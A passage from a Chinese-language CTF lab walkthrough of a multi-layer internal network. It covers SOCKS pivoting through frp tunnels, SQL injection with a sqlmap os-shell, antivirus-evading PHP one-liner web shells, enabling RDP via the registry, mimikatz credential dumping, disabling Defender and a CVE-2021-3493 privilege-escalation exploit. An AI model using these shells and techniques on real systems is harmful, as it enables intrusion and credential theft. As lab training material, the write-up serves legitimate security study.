3.2 第二层
现第二块网
然后添加路由,设置socks5代理,使用代理nmap进行IP扫描
扫描到了20.100的80端口开放了
NMAP扫描只开放了80,443
在firefox设置一个socks5代理
然后使用socks代理访问到了80端口,是一个OVAS-PHP
随手一个admin,进入到了后台登录。这个系统没见过,百度搜了一下也没什么信息
给BURP设置一个socks代理,然后访问网站抓包,proxy的代理配置好之后,socks配置完成就可以抓包了
我用的kali自带的burp,爆破起来很慢,就偷个懒,写一个简单的字典进行爆破。就假装我这里爆破成功了
在后台修改文章处存在SQL注入
搭建frp隧道 服务端
#frps.ini [common] bind_port = 7002
客户端
#frpc.ini [common] server_addr = 192.168.0.107 server_port = 7002 [plugin_socks] type = tcp remote_port = 7777 plugin = socks5
使用冰蝎上传frpc到目标服务器,然后使用msf执行
python3 -c 'import pty;pty.spawn("/bin/bash")
使用sqlmap进行爆破,sqlmap -r sql.txt --proxy=socks://10.30.7.99:8888,还是frp快!存在SQL注入
os-shell是可以执行命令的,当前还是一个system权限
我在C:\xampp\htdocs\ovas\admin\categories目录下写了文件
http://10.0.20.100/admin/categories/index2.php
phpinfo();可以执行,但是写木马文件就会被杀掉。
echo <?php $a = $_REQUEST['d'];$a = "$a";$b['test'] = "";eval($b['test']."$a");?> > index.php echo <?php $a = "assert";$fun = "a";array_map($$fun, array($_REQUEST['a']));?> > test.php
存在windows defender
借用作者大大的免杀一句话,我写到了根目录的index.php,如果写到admin还需要添加数据,添加上登录的账号密码:
存在第二块网卡
免杀上线MSF,执行上传的后门文件
第二个flag在c:\Users\Administrator\flag.txt,不能使用doc命令搜索,名字为flag/flag.txt的太多了
3.3 第三层
添加路由
执行mimikazi需要system权限,使用ps列举,然后窃取token
抓取hash
使用md5解密网站进行解密,查询到是付费的,由于是本地,就不解密了Admin#123
使用nmap或者msf的模块对端口进行扫描,只开放了22
开启windows机器的3389进行登录
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用代理工具,这是kali的代理
连接错误是由于开启了验证
需要使用相同版本的计算机才可以,这里我没有2016的机器就直接关掉这个选项了
3389登录成功
存在一个ssh连接工具,使用win2016的登录密码可以进来,然后有10.0.10.110的ssh用户连接
我直接给Defender关闭了
我在这里关闭了,110也访问不到2016这台机器,所以就不搞msf了,查看110这台机器的版本,可以搜索到一些提权脚本
下载脚本进行提权 git clone https://github.com/briskets/CVE-2021-3493
编译好之后上传,提权成功
获取最后的flag
